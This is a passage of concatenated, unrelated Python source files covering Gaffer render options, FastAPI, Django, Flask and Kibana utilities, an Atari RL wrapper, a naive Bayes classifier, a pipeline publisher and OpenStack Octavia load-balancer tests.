],
"options.hiderDepthFilter.value" : [
"preset:Min", "min",
"preset:Max", "max",
"preset:Average", "average",
"preset:Midpoint", "midpoint",
"plugValueWidget:type", "GafferUI.PresetsPlugValueWidget",
],
"options.hiderJitter" : [
"description",
"""
Whether or not each pixel sample is
jittered about the centre of its subpixel
position, or if they're aligned in a
regular grid. If in doubt, leave this on.
""",
"layout:section", "Hider",
"label", "Jitter",
],
"options.hiderSampleMotion" : [
"description",
"""
May be turned off to disable the sampling of
motion blur, but keep motion vectors available
for use in shaders. This is useful for
rendering a motion vector pass to allow
2D motion blur to be applied as a post process.
If you simply wish to turn off motion blur
entirely, then use the motion blur settings
in the StandardOptions node.
""",
"layout:section", "Hider",
"label", "Sample Motion",
],
"options.hiderExtremeMotionDOF" : [
"description",
"""
An alternative sampling algorithm which
is more expensive, but gives higher quality
results when objects are both moving quickly
and are out of focus.
""",
"layout:section", "Hider",
"label", "Extreme Motion DOF",
],
"options.hiderProgressive" : [
"description",
"""
Renders at progressively increasing levels
of quality, to give quick low quality feedback
at the start of an interactive render. Only
applies when the raytrace hider is used.
""",
"layout:section", "Hider",
"label", "Progressive",
],
# Statistics
"options.statisticsLevel" : [
"description",
"""
Determines the verbosity of statistics
output.
""",
"layout:section", "Statistics",
"label", "Level",
],
"options.statisticsLevel.value" : [
"preset:0 (Off)", 0,
"preset:1", 1,
"preset:2", 2,
"preset:3 (Most Verbose)", 3,
"plugValueWidget:type", "GafferUI.PresetsPlugValueWidget",
],
"options.statisticsFileName" : [
"description",
"""
The name of a file where the statistics
will be written.
""",
"layout:section", "Statistics",
"label", "File Name",
],
"options.statisticsFileName.value" : [
"plugValueWidget:type", "GafferUI.FileSystemPathPlugValueWidget",
"pathPlugValueWidget:leaf", True,
"pathPlugValueWidget:bookmarks", "statistics",
"fileSystemPathPlugValueWidget:extensions", IECore.StringVectorData( [ "htm", "html", "txt", "stats" ] ),
],
"options.statisticsProgress" : [
"description",
"""
Turning this on causes a render progress
percentage to be printed out continuously
during rendering.
""",
"layout:section", "Statistics",
"label", "Progress",
],
# Search Paths
"options.shaderSearchPath" : [
"description",
"""
The filesystem paths where shaders are
searched for. Paths should be separated
by ':'.
""",
"layout:section", "Search Paths",
"label", "Shaders",
],
"options.textureSearchPath" : [
"description",
"""
			The filesystem paths where textures are
located. Paths should be separated
by ':'.
""",
"layout:section", "Search Paths",
"label", "Textures",
],
"options.displaySearchPath" : [
"description",
"""
The filesystem paths where display driver
plugins are located. These will be used when searching
for drivers specified using the Outputs
node. Paths should be separated by ':'.
""",
"layout:section", "Search Paths",
"label", "Displays",
],
"options.archiveSearchPath" : [
"description",
"""
The filesystem paths where RIB archives
are located. These will be used when searching
for archives specified using the ExternalProcedural
node. Paths should be separated by ':'.
""",
"layout:section", "Search Paths",
"label", "Archives",
],
"options.proceduralSearchPath" : [
"description",
"""
The filesystem paths where DSO procedurals
are located. These will be used when searching
for procedurals specified using the ExternalProcedural
node. Paths should be separated by ':'.
""",
"layout:section", "Search Paths",
"label", "Procedurals",
],
}
)
|
python
|
from fastapi import Request
from geobook.db.backends.mongodb import exceptions
from starlette.responses import JSONResponse
async def validation_exception_handler(
request: Request,
exc: exceptions.ValidationError,
) -> JSONResponse:
    headers = getattr(exc, 'headers', None)
    return JSONResponse(
        {'detail': f'{exc}'}, status_code=400, headers=headers
    )
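# Hedged usage sketch: the handler above still has to be registered on the
# application object; the `app` name below is an assumption, not defined here.
#   app.add_exception_handler(exceptions.ValidationError, validation_exception_handler)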
|
python
|
# Generated by Django 2.0.5 on 2018-06-12 17:31
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('webarchives', '0004_auto_20180609_1839'),
]
operations = [
migrations.AlterField(
model_name='importedrecord',
name='metadata',
field=django.contrib.postgres.fields.jsonb.JSONField(default={}),
),
]
|
python
|
from collections import deque
import numpy as np
from gym import spaces
from gym.envs.atari.atari_env import AtariEnv
from . import utils
class MultiFrameAtariEnv(AtariEnv):
metadata = {'render.modes': ['human', 'rgb_array']}
no_op_steps = 30
def __init__(self, game='pong', obs_type='image', buf_size=4, gray=True,
frameskip=4, repeat_action_probability=0.):
super(MultiFrameAtariEnv, self).__init__(game=game, obs_type=obs_type,
frameskip=frameskip,
repeat_action_probability=repeat_action_probability)
self._cur_st = None
self._nx_st = None
self._img_buf = deque(maxlen=buf_size)
self._gray = gray
self._shape = (84, 84)
if self._gray:
self.observation_space = spaces.Box(low=0, high=255,
shape=(self._shape[0], self._shape[1], buf_size),
dtype=np.uint8)
else:
self.observation_space = spaces.Box(low=0, high=255,
shape=(self._shape[0], self._shape[1], 3, buf_size),
dtype=np.uint8)
self._initialize()
def _initialize(self):
self._nx_st = super(MultiFrameAtariEnv, self).reset()
for _ in range(self._img_buf.maxlen):
self._img_buf.append(utils.preprocess(self._nx_st, self._shape, self._gray))
for _ in range(np.random.randint(1, self.no_op_steps) // self.frameskip):
self.step(0)
def step(self, a):
self._cur_st = self._nx_st.copy()
self._nx_st, reward, done, info = super(MultiFrameAtariEnv, self).step(a)
nx_st = np.maximum(self._nx_st, self._cur_st) if self._gray else self._nx_st
self._img_buf.append(utils.preprocess(nx_st, self._shape, self._gray))
return np.array(list(self._img_buf)), reward, done, info
def reset(self):
self._img_buf.clear()
self._initialize()
return np.array(list(self._img_buf))
from gym.envs.registration import register
for game in ['air_raid', 'alien', 'amidar', 'assault', 'asterix', 'asteroids', 'atlantis',
'bank_heist', 'battle_zone', 'beam_rider', 'berzerk', 'bowling', 'boxing', 'breakout', 'carnival',
'centipede', 'chopper_command', 'crazy_climber', 'demon_attack', 'double_dunk',
'elevator_action', 'enduro', 'fishing_derby', 'freeway', 'frostbite', 'gopher', 'gravitar',
'hero', 'ice_hockey', 'jamesbond', 'journey_escape', 'kangaroo', 'krull', 'kung_fu_master',
'montezuma_revenge', 'ms_pacman', 'name_this_game', 'phoenix', 'pitfall', 'pong', 'pooyan',
'private_eye', 'qbert', 'riverraid', 'road_runner', 'robotank', 'seaquest', 'skiing',
'solaris', 'space_invaders', 'star_gunner', 'tennis', 'time_pilot', 'tutankham', 'up_n_down',
'venture', 'video_pinball', 'wizard_of_wor', 'yars_revenge', 'zaxxon']:
name = ''.join([g.capitalize() for g in game.split('_')])
register(
id='MultiFrame{}-v0'.format(name),
entry_point='distributed_rl.libs.wrapped_env:MultiFrameAtariEnv',
kwargs={'game': game, 'obs_type': 'image'},
max_episode_steps=10000,
nondeterministic=False,
)
register(
id='SingleFrame{}-v0'.format(name),
entry_point='distributed_rl.libs.wrapped_env:MultiFrameAtariEnv',
        kwargs={'game': game, 'obs_type': 'image', 'buf_size': 1, 'gray': False},
max_episode_steps=10000,
nondeterministic=False,
)
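# Hedged usage sketch: importing this module runs the registrations above, so the
# environments can be created by id (e.g. 'MultiFramePong-v0').
#   import gym
#   import distributed_rl.libs.wrapped_env  # noqa: F401  (registers the envs)
#   env = gym.make('MultiFramePong-v0')
#   obs = env.reset()                        # stack of preprocessed 84x84 frames
#   obs, reward, done, info = env.step(env.action_space.sample())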
|
python
|
from random import randint
from time import sleep
computador = randint(0, 5)
print('-=' * 20)
print('I am thinking of a number between 0 and 5. Try to guess it...')
print('-=' * 20)
jogador = int(input('Which number did I think of? '))
print('Processing...')
sleep(3)
if jogador == computador:
    print('Congratulations! You got it right!')
else:
    print(f'I win! I was thinking of {computador}, not {jogador}.')
|
python
|
try:
from pycaret.internal.pycaret_experiment import TimeSeriesExperiment
using_pycaret=True
except ImportError:
using_pycaret=False
|
python
|
#! /usr/bin/env python
import json
import argparse
from dashboard.common import elastic_access
from dashboard.common import logger_utils
from dashboard.conf import config
from dashboard.conf import testcases
from dashboard_assembler import DashboardAssembler
from visualization_assembler import VisualizationAssembler
logger = logger_utils.DashboardLogger('elastic2kibana').get
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config-file",
dest='config_file',
help="Config file location")
args = parser.parse_args()
CONF = config.APIConfig().parse(args.config_file)
_installers = {'fuel', 'apex', 'compass', 'joid'}
class KibanaConstructor(object):
def __init__(self):
super(KibanaConstructor, self).__init__()
self.js_dict = {}
def construct(self):
for project, case_dicts in testcases.testcases_yaml.items():
for case in case_dicts:
self._construct_by_case(project, case)
return self
def _construct_by_case(self, project, case):
case_name = case.get('name')
vis_ps = case.get('visualizations')
family = case.get('test_family')
for vis_p in vis_ps:
self._construct_by_vis(project, case_name, family, vis_p)
def _construct_by_vis(self, project, case, family, vis_p):
for installer in _installers:
pods_and_scenarios = self._get_pods_and_scenarios(project,
case,
installer)
            for pod, scenarios in pods_and_scenarios.items():
visualizations = self._construct_visualizations(project,
case,
installer,
pod,
scenarios,
vis_p,
CONF.es_url,
CONF.es_creds)
dashboard = DashboardAssembler(project,
case,
family,
installer,
pod,
visualizations,
CONF.es_url,
CONF.es_creds)
self._set_js_dict(case,
pod,
installer,
family,
vis_p.get('name'),
dashboard.id)
@staticmethod
def _construct_visualizations(project,
case,
installer,
pod,
scenarios,
vis_p,
es_url,
es_creds):
visualizations = []
for scenario in scenarios:
visualizations.append(VisualizationAssembler(project,
case,
installer,
pod,
scenario,
vis_p,
es_url,
es_creds))
return visualizations
def _set_js_dict(self, case, pod, installer, family, metric, id):
test_label = '{} {}'.format(case, metric)
if family not in self.js_dict:
self.js_dict[family] = {}
js_test_family = self.js_dict[family]
if test_label not in js_test_family:
js_test_family[test_label] = {}
js_test_label = js_test_family[test_label]
if installer not in js_test_label:
js_test_label[installer] = {}
js_installer = js_test_label[installer]
js_installer[pod] = CONF.kibana_url + '#/dashboard/' + id
def config_js(self):
with open(CONF.js_path, 'w+') as conf_js_fdesc:
conf_js_fdesc.write('var kibana_dashboard_links = ')
conf_js_fdesc.write(str(self.js_dict).replace("u'", "'"))
def _get_pods_and_scenarios(self, project, case, installer):
query = json.JSONEncoder().encode({
"query": {
"bool": {
"must": [
{"match_all": {}}
],
"filter": [
{"match": {"installer": installer}},
{"match": {"project_name": project}},
{"match": {"case_name": case}}
]
}
}
})
elastic_data = elastic_access.get_docs(CONF.index_url,
CONF.es_creds,
query)
pods_and_scenarios = {}
for data in elastic_data:
pod = data['pod_name']
if pod in pods_and_scenarios:
pods_and_scenarios[pod].add(data['scenario'])
else:
pods_and_scenarios[pod] = {data['scenario']}
if 'all' in pods_and_scenarios:
pods_and_scenarios['all'].add(data['scenario'])
else:
pods_and_scenarios['all'] = {data['scenario']}
return pods_and_scenarios
def main():
    KibanaConstructor().construct().config_js()
if __name__ == '__main__':
    main()
|
python
|
#!/home/ubuntu/DEF/PG/project/venv3/bin/python3
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
python
|
from .layers import *
|
python
|
import os
import json
class Config:
def __init__(self, configpath):
self._data = self._get_config_data(configpath)
self.client_id = self._data['client_id']
self.username = self._data['username']
self.account_id = self._data['account_id']
self.redirect = self._data['redirect']
self.allocations = self._data['allocations']
def _get_config_data(self, configpath):
return json.load(open(os.path.expandvars(configpath)))
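# Hedged usage sketch: the path and JSON keys below are assumptions matching the
# attributes read in __init__, not a file shipped with this project.
#   $HOME/.myapp/config.json:
#     {"client_id": "...", "username": "...", "account_id": "...",
#      "redirect": "https://localhost/callback", "allocations": {}}
#   cfg = Config('$HOME/.myapp/config.json')   # env vars are expanded by expandvars
#   print(cfg.username)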
|
python
|
class OpenL3Error(Exception):
"""The root OpenL3 exception class"""
pass
|
python
|
from aiogram.dispatcher.filters.state import State, StatesGroup
class AddStoreForm(StatesGroup):
city_id = State()
store_id = State()
class SearchSku(StatesGroup):
select_sku = State()
|
python
|
import os
import json
from flask import request, abort, jsonify, make_response, Response
from jsonschema import validate, ErrorTree, Draft4Validator as Validator
from app.properties import properties_bp
from .models import Property
from .repositories import PropertyRepository as Repository
from .utils import load
@properties_bp.route('/properties', methods=['POST'])
def create_properties():
if (not request.is_json):
abort(make_response(jsonify(message='Mime type is not valid'), 415))
else:
errors = Validator(load('schemas/property.schema')).iter_errors(request.get_json())
response_error = _errors(errors)
if (response_error):
resp = Response(response_error,
status=422,
mimetype="application/json")
return resp
else:
prop = Property(**request.get_json())
Repository.create(prop)
return jsonify(prop.as_dict()), 201
@properties_bp.route('/properties/<id>')
def find_property(id):
prop = Repository.find_by_id(id);
if (not prop):
message = 'Property id {} not found'.format(id)
abort(make_response(jsonify(message=message), 404))
return jsonify(prop.as_dict()), 200
@properties_bp.route('/properties')
def search_properties():
upper_x = request.args['ax']
upper_y = request.args['ay']
bottom_x = request.args['bx']
bottom_y = request.args['by']
params_json = '{"ax":%s, "ay":%s, "bx":%s, "by":%s }' % (upper_x, upper_y, bottom_x, bottom_y)
errors = Validator(load('schemas/filter.schema')).iter_errors(json.loads(params_json))
response_error = _errors(errors)
if (response_error):
resp = Response(response_error,
status=422,
mimetype="application/json")
return resp
result = Repository.find_properties(upper_x, bottom_x, bottom_y, upper_y)
if(not result):
message = 'No properties found with these coordinates'
abort(make_response(jsonify(message=message), 404))
else:
response = '{ "foundProperties": %s, "properties": %s }' % (len(result), json.dumps(result, ensure_ascii=False)) #, )
return Response(response,
status=200,
mimetype="application/json")
@properties_bp.errorhandler(400)
def bad_request(e):
return jsonify(error=400, text=str(e)), 400
def _errors(errors):
lista = []
response_error = ''
for error in errors:
msg = '{"field":"%s","message":"%s"}' % (''.join(error.path), error.message)
lista.append(msg)
if (lista):
response_error = '{"errors": [%s]}' % (','.join(lista))
return response_error
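# Hedged usage examples: host/port and payloads are assumptions; routes and query
# parameters come from the views above.
#   curl -X POST http://localhost:5000/properties \
#        -H 'Content-Type: application/json' \
#        -d '<JSON matching schemas/property.schema>'
#   curl http://localhost:5000/properties/42
#   curl 'http://localhost:5000/properties?ax=0&ay=1000&bx=600&by=0'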
|
python
|
from .annotation_decorator import annotate
from .annotation_decorator import annotate_class
from .annotation_decorator import annotate_method
from .application import WinterApplication
from .component import Component
from .component import component
from .component import is_component
from .component_method import ComponentMethod
from .component_method import component_method
from .component_method_argument import ArgumentDoesNotHaveDefault
from .component_method_argument import ComponentMethodArgument
from .utils import cached_property
|
python
|
import sys
printf = lambda fmt,*args: sys.stdout.write(fmt%args)
printf ("This is a %s of %is of possibilities of %s","test",1000,printf)
|
python
|
#!/usr/bin/python
import pickle
import pandas as pd
import numpy as np
def convert_and_clean_data(data_dict, fill_na = 1.e-5):
'''
Takes a dataset as a dictionary, then converts it into a Pandas DataFrame for convenience.
Replaces all NA values by the value specified in 'fill_na' (or None).
Cleans up data errors on two observations.
Returns a Pandas DataFrame.
'''
# Convert to DataFrame
data_df = pd.DataFrame.from_dict(data_dict, orient = 'index', dtype = float)
if fill_na:
data_df = data_df.fillna(fill_na)
# Sort columns in correct order
column_names = ['poi', 'salary', 'bonus', 'long_term_incentive', 'deferred_income',
'deferral_payments', 'loan_advances','other', 'expenses', 'director_fees', 'total_payments',
'exercised_stock_options', 'restricted_stock', 'restricted_stock_deferred', 'total_stock_value',
'from_messages', 'to_messages', 'from_poi_to_this_person', 'from_this_person_to_poi',
'shared_receipt_with_poi']
data_df = data_df[column_names]
# Correct two data errors
# Robert Belfer: Data shifted right by one column
    for j in range(1, 14):
        data_df.loc['BELFER ROBERT', data_df.columns[j]] = \
            data_df.loc['BELFER ROBERT', data_df.columns[j + 1]]
    data_df.loc['BELFER ROBERT', data_df.columns[14]] = 1.e-5
    # Sanjay Bhatnagar: Data shifted left by one column
    for j in range(14, 2, -1):
        data_df.loc['BHATNAGAR SANJAY', data_df.columns[j]] = \
            data_df.loc['BHATNAGAR SANJAY', data_df.columns[j - 1]]
    data_df.loc['BHATNAGAR SANJAY', data_df.columns[1]] = 1.e-5
return data_df
def drop_outliers(data_df, outliers):
'''
'outliers' is a list of indexes for observations to be dropped.
'''
data_df = data_df.drop(outliers)
return data_df
def create_new_features(data_df, log_columns):
'''
Creates new email-related features by aggregating some of the existing ones.
Applies log transformation to the specified list of features.
'''
# Create 3 aggregate email features to help reduce dimensionality
data_df.loc[:, 'sent_vs_received'] = 1. * data_df.loc[:, 'from_messages'] / \
data_df.loc[:, 'to_messages']
data_df.loc[:, 'total_emails'] = data_df.loc[:, 'from_messages'] + data_df.loc[:, 'to_messages']
data_df.loc[:, 'emails_with_poi'] = data_df.loc[:, 'from_this_person_to_poi'] + \
data_df.loc[:, 'from_poi_to_this_person'] + data_df.loc[:, 'shared_receipt_with_poi']
# Create log-transformed features from the features in list to make data look closer to normal
for col in log_columns:
# Some of the financial data is negative, which causes undefined values with log. Take abs:
data_df.loc[:, 'log_' + col] = np.log(np.abs(data_df.loc[:, col]))
return data_df
log_columns = ['bonus', 'deferred_income', 'long_term_incentive', 'other',
'restricted_stock_deferred', 'total_stock_value']
features_list = ['poi', 'salary', 'bonus', 'long_term_incentive', 'deferred_income',
'deferral_payments', 'loan_advances','other', 'expenses', 'director_fees', 'total_payments',
'exercised_stock_options', 'restricted_stock', 'restricted_stock_deferred',
'total_stock_value', 'from_messages', 'to_messages', 'from_poi_to_this_person',
'from_this_person_to_poi', 'shared_receipt_with_poi']
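# Hedged usage sketch: the pickle file name and the outlier key are assumptions,
# not part of this module.
#   with open('final_project_dataset.pkl', 'rb') as f:
#       data_dict = pickle.load(f)
#   data_df = convert_and_clean_data(data_dict)
#   data_df = drop_outliers(data_df, ['TOTAL'])
#   data_df = create_new_features(data_df, log_columns)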
|
python
|
SIZE = (640,480)
TITLE = "Pipboy"
TEXT_COLOUR = (0,255,0)
TEXT_SIZE = 12
TEXT_FONT = '../resources/monofonto.ttf'
BOARDER_SPACE = 10
TOP_BOARDER = 6
BOX_SPACE = 20
|
python
|
import os
import sys
import copy
import argparse
from avalon import io
from avalon.tools import publish
import pyblish.api
import pyblish.util
from pype.api import Logger
import pype
import pype.hosts.celaction
from pype.hosts.celaction import api as celaction
log = Logger().get_logger("Celaction_cli_publisher")
publish_host = "celaction"
HOST_DIR = os.path.dirname(os.path.abspath(pype.hosts.celaction.__file__))
PLUGINS_DIR = os.path.join(HOST_DIR, "plugins")
PUBLISH_PATH = os.path.join(PLUGINS_DIR, "publish")
LOAD_PATH = os.path.join(PLUGINS_DIR, "load")
CREATE_PATH = os.path.join(PLUGINS_DIR, "create")
INVENTORY_PATH = os.path.join(PLUGINS_DIR, "inventory")
def cli():
parser = argparse.ArgumentParser(prog="celaction_publish")
parser.add_argument("--currentFile",
help="Pass file to Context as `currentFile`")
parser.add_argument("--chunk",
help=("Render chanks on farm"))
parser.add_argument("--frameStart",
help=("Start of frame range"))
parser.add_argument("--frameEnd",
help=("End of frame range"))
parser.add_argument("--resolutionWidth",
help=("Width of resolution"))
parser.add_argument("--resolutionHeight",
help=("Height of resolution"))
celaction.kwargs = parser.parse_args(sys.argv[1:]).__dict__
def _prepare_publish_environments():
"""Prepares environments based on request data."""
env = copy.deepcopy(os.environ)
project_name = os.getenv("AVALON_PROJECT")
asset_name = os.getenv("AVALON_ASSET")
io.install()
project_doc = io.find_one({
"type": "project"
})
av_asset = io.find_one({
"type": "asset",
"name": asset_name
})
parents = av_asset["data"]["parents"]
hierarchy = ""
if parents:
hierarchy = "/".join(parents)
env["AVALON_PROJECT"] = project_name
env["AVALON_ASSET"] = asset_name
env["AVALON_TASK"] = os.getenv("AVALON_TASK")
env["AVALON_WORKDIR"] = os.getenv("AVALON_WORKDIR")
env["AVALON_HIERARCHY"] = hierarchy
env["AVALON_PROJECTCODE"] = project_doc["data"].get("code", "")
env["AVALON_APP"] = f"hosts.{publish_host}"
env["AVALON_APP_NAME"] = "celaction_local"
env["PYBLISH_HOSTS"] = publish_host
os.environ.update(env)
def main():
# prepare all environments
_prepare_publish_environments()
# Registers pype's Global pyblish plugins
pype.install()
if os.path.exists(PUBLISH_PATH):
log.info(f"Registering path: {PUBLISH_PATH}")
pyblish.api.register_plugin_path(PUBLISH_PATH)
pyblish.api.register_host(publish_host)
return publish.show()
if __name__ == "__main__":
cli()
result = main()
sys.exit(not bool(result))
|
python
|
# Copyright 2018 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Encapsulate octavia testing."""
import logging
import subprocess
import tenacity
import zaza.openstack.charm_tests.test_utils as test_utils
import zaza.openstack.utilities.openstack as openstack_utils
class CharmOperationTest(test_utils.OpenStackBaseTest):
"""Charm operation tests."""
@classmethod
def setUpClass(cls):
"""Run class setup for running Octavia charm operation tests."""
super(CharmOperationTest, cls).setUpClass()
def test_pause_resume(self):
"""Run pause and resume tests.
Pause service and check services are stopped, then resume and check
they are started.
"""
self.pause_resume(['apache2'])
class LBAASv2Test(test_utils.OpenStackBaseTest):
"""LBaaSv2 service tests."""
@classmethod
def setUpClass(cls):
"""Run class setup for running LBaaSv2 service tests."""
super(LBAASv2Test, cls).setUpClass()
def test_create_loadbalancer(self):
"""Create load balancer."""
keystone_session = openstack_utils.get_overcloud_keystone_session()
neutron_client = openstack_utils.get_neutron_session_client(
keystone_session)
nova_client = openstack_utils.get_nova_session_client(
keystone_session)
# Get IP of the prepared payload instances
payload_ips = []
for server in nova_client.servers.list():
payload_ips.append(server.networks['private'][0])
self.assertTrue(len(payload_ips) > 0)
resp = neutron_client.list_networks(name='private')
subnet_id = resp['networks'][0]['subnets'][0]
if openstack_utils.dvr_enabled():
resp = neutron_client.list_networks(name='private_lb_fip_network')
vip_subnet_id = resp['networks'][0]['subnets'][0]
else:
vip_subnet_id = subnet_id
octavia_client = openstack_utils.get_octavia_session_client(
keystone_session)
result = octavia_client.load_balancer_create(
json={
'loadbalancer': {
'description': 'Created by Zaza',
'admin_state_up': True,
'vip_subnet_id': vip_subnet_id,
'name': 'zaza-lb-0',
}})
lb_id = result['loadbalancer']['id']
lb_vip_port_id = result['loadbalancer']['vip_port_id']
@tenacity.retry(wait=tenacity.wait_fixed(1),
reraise=True, stop=tenacity.stop_after_delay(900))
def wait_for_lb_resource(octavia_show_func, resource_id,
operating_status=None):
resp = octavia_show_func(resource_id)
logging.info(resp['provisioning_status'])
assert resp['provisioning_status'] == 'ACTIVE', (
'load balancer resource has not reached '
'expected provisioning status: {}'
.format(resp))
if operating_status:
logging.info(resp['operating_status'])
assert resp['operating_status'] == operating_status, (
'load balancer resource has not reached '
'expected operating status: {}'.format(resp))
return resp
logging.info('Awaiting loadbalancer to reach provisioning_status '
'"ACTIVE"')
resp = wait_for_lb_resource(octavia_client.load_balancer_show, lb_id)
logging.info(resp)
result = octavia_client.listener_create(
json={
'listener': {
'loadbalancer_id': lb_id,
'name': 'listener1',
'protocol': 'HTTP',
'protocol_port': 80
},
})
listener_id = result['listener']['id']
logging.info('Awaiting listener to reach provisioning_status '
'"ACTIVE"')
resp = wait_for_lb_resource(octavia_client.listener_show, listener_id)
logging.info(resp)
result = octavia_client.pool_create(
json={
'pool': {
'listener_id': listener_id,
'name': 'pool1',
'lb_algorithm': 'ROUND_ROBIN',
'protocol': 'HTTP',
},
})
pool_id = result['pool']['id']
logging.info('Awaiting pool to reach provisioning_status '
'"ACTIVE"')
resp = wait_for_lb_resource(octavia_client.pool_show, pool_id)
logging.info(resp)
result = octavia_client.health_monitor_create(
json={
'healthmonitor': {
'pool_id': pool_id,
'delay': 5,
'max_retries': 4,
'timeout': 10,
'type': 'HTTP',
'url_path': '/',
},
})
healthmonitor_id = result['healthmonitor']['id']
logging.info('Awaiting healthmonitor to reach provisioning_status '
'"ACTIVE"')
resp = wait_for_lb_resource(octavia_client.health_monitor_show,
healthmonitor_id)
logging.info(resp)
for ip in payload_ips:
result = octavia_client.member_create(
pool_id=pool_id,
json={
'member': {
'subnet_id': subnet_id,
'address': ip,
'protocol_port': 80,
},
})
member_id = result['member']['id']
logging.info('Awaiting member to reach provisioning_status '
'"ACTIVE"')
resp = wait_for_lb_resource(
lambda x: octavia_client.member_show(
pool_id=pool_id, member_id=x),
member_id,
operating_status='ONLINE')
logging.info(resp)
lb_fp = openstack_utils.create_floating_ip(
neutron_client, 'ext_net', port={'id': lb_vip_port_id})
@tenacity.retry(wait=tenacity.wait_fixed(1),
reraise=True, stop=tenacity.stop_after_delay(900))
def get_payload():
return subprocess.check_output(
['wget', '-O', '-',
'http://{}/'.format(lb_fp['floating_ip_address'])],
universal_newlines=True)
snippet = 'This is the default welcome page'
assert snippet in get_payload()
logging.info('Found "{}" in page retrieved through load balancer at '
'"http://{}/"'
.format(snippet, lb_fp['floating_ip_address']))
|
python
|
import numpy as np;
import numpy.matlib as npm;
import DataHelper;
# assumes class labels are 0, 1, ..., and discrete feature values are 0, 1, 2, ...
class NaiveBayes:
def __init__(self, smoothingFactor):
self.__smoothingFactor = smoothingFactor;
self.__discreteFeatureIndices = None;
self.__discreteFeatureValueNumbers = None;
self.__continuousFeatureIndices = None;
self.__classProbability = None;
self.__discreteFeatureProbability = None;
self.__continuousFeatureArguments = None;
def __calcDiscreteProbability(self, dataSet, featureValueNumbers):
if dataSet is None:
return np.log(np.mat(np.ones((featureValueNumbers.max(), featureValueNumbers.shape[1]))) / featureValueNumbers);
frequency = None;
count = dataSet.shape[0];
result = np.mat(np.zeros((featureValueNumbers.max(), dataSet.shape[1])));
for i in range(0, result.shape[1]):
frequency = DataHelper.statisticFrequency(dataSet[:, i]);
result[:, i] = np.mat([np.log(((frequency[key] if key in frequency else 0) + self.__smoothingFactor) / (count + featureValueNumbers[0, i] * self.__smoothingFactor)) if key < featureValueNumbers[0, i] else np.nan for key in range(0, result.shape[0])]).T;
return result;
def __calcContinuousArguments(self, dataSet, featureCount):
return np.vstack((dataSet.mean(axis = 0), dataSet.std(axis = 0))) if dataSet is not None else np.mat(np.zeros((2, featureCount)));
def train(self, dataSet, featureValueNumbers):
if dataSet is None or not isinstance(dataSet, np.matrix) or featureValueNumbers is None or not isinstance(featureValueNumbers, np.matrix):
raise ValueError();
self.__discreteFeatureIndices = np.where(featureValueNumbers.A.flatten() > 0)[0];
self.__continuousFeatureIndices = np.where(featureValueNumbers.A.flatten() <= 0)[0];
if len(self.__discreteFeatureIndices) > 0:
self.__discreteFeatureValueNumbers = featureValueNumbers[np.where(featureValueNumbers > 0)];
classSets = DataHelper.groupBy(dataSet, -1);
classCount = int(max(classSets.keys())) + 1;
self.__classProbability = np.mat([np.log(((classSets[key].shape[0] if key in classSets else 0) + self.__smoothingFactor) / (dataSet.shape[0] + classCount * self.__smoothingFactor)) for key in range(0, classCount)]);
self.__discreteFeatureProbability = list(range(0, classCount));
self.__continuousFeatureArguments = list(range(0, classCount));
for key in range(0, classCount):
if len(self.__discreteFeatureIndices) > 0:
self.__discreteFeatureProbability[key] = self.__calcDiscreteProbability(classSets[key][:, self.__discreteFeatureIndices] if key in classSets else None, self.__discreteFeatureValueNumbers);
if len(self.__continuousFeatureIndices) > 0:
self.__continuousFeatureArguments[key] = self.__calcContinuousArguments(classSets[key][:, self.__continuousFeatureIndices] if key in classSets else None, len(self.__continuousFeatureIndices));
def predict(self, dataSet):
if dataSet is None or not isinstance(dataSet, np.matrix):
raise ValueError();
discreteRange = None;
discreteSet, continuousSet = None, None;
allProbability, discreteProbability, continuousProbability = None, None, None;
result = np.mat(np.zeros((dataSet.shape[0], self.__classProbability.shape[1])));
if len(self.__discreteFeatureIndices) > 0:
discreteSet = dataSet[:, self.__discreteFeatureIndices];
discreteRange = list(range(0, len(self.__discreteFeatureIndices)));
if len(self.__continuousFeatureIndices) > 0:
continuousSet = dataSet[:, self.__continuousFeatureIndices];
for c in range(0, result.shape[1]):
if discreteSet is not None:
discreteProbability = self.__discreteFeatureProbability[c][np.mat(discreteSet, dtype = int), discreteRange];
if continuousSet is not None:
normalArguments = self.__continuousFeatureArguments[c];
mean, var, std = normalArguments[0, :], np.power(normalArguments[1, :], 2), normalArguments[1, :];
zeroStdIndices = np.where(std == 0)[1];
if len(zeroStdIndices) > 0:
var[:, zeroStdIndices] = 1;
std[:, zeroStdIndices] = 1;
continuousProbability = np.power(continuousSet - mean, 2) / (-2 * var) - np.log(std);
if len(zeroStdIndices) > 0:
continuousProbability[:, zeroStdIndices] = 0;
if discreteSet is not None and continuousSet is not None:
allProbability = np.hstack((discreteProbability, continuousProbability));
elif discreteSet is not None:
allProbability = discreteProbability;
else:
allProbability = continuousProbability;
result[:, c] = allProbability.sum(1);
result = result + self.__classProbability;
return np.mat(result.argmax(axis = 1));
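# Hedged usage sketch (kept as comments because it assumes DataHelper.groupBy
# groups rows by the last column while keeping all columns; values are illustrative):
#   train_data = np.mat([[0., 1., 2.5, 0.],
#                        [1., 0., 3.1, 1.],
#                        [2., 1., 2.9, 1.]])          # last column = class label
#   feature_value_numbers = np.mat([[3, 2, 0]])       # 0 marks a continuous feature
#   model = NaiveBayes(smoothingFactor=1.0)
#   model.train(train_data, feature_value_numbers)
#   print(model.predict(np.mat([[1., 1., 3.0]])))     # column vector of class indices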
|
python
|
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/main/LICENSE
# Copyright (c) https://github.com/PyCQA/astroid/blob/main/CONTRIBUTORS.txt
"""This module contains mixin classes for scoped nodes."""
from typing import TYPE_CHECKING, Dict, List, TypeVar
from astroid.filter_statements import _filter_stmts
from astroid.nodes import node_classes, scoped_nodes
from astroid.nodes.scoped_nodes.utils import builtin_lookup
if TYPE_CHECKING:
from astroid import nodes
_T = TypeVar("_T")
class LocalsDictNodeNG(node_classes.LookupMixIn, node_classes.NodeNG):
"""this class provides locals handling common to Module, FunctionDef
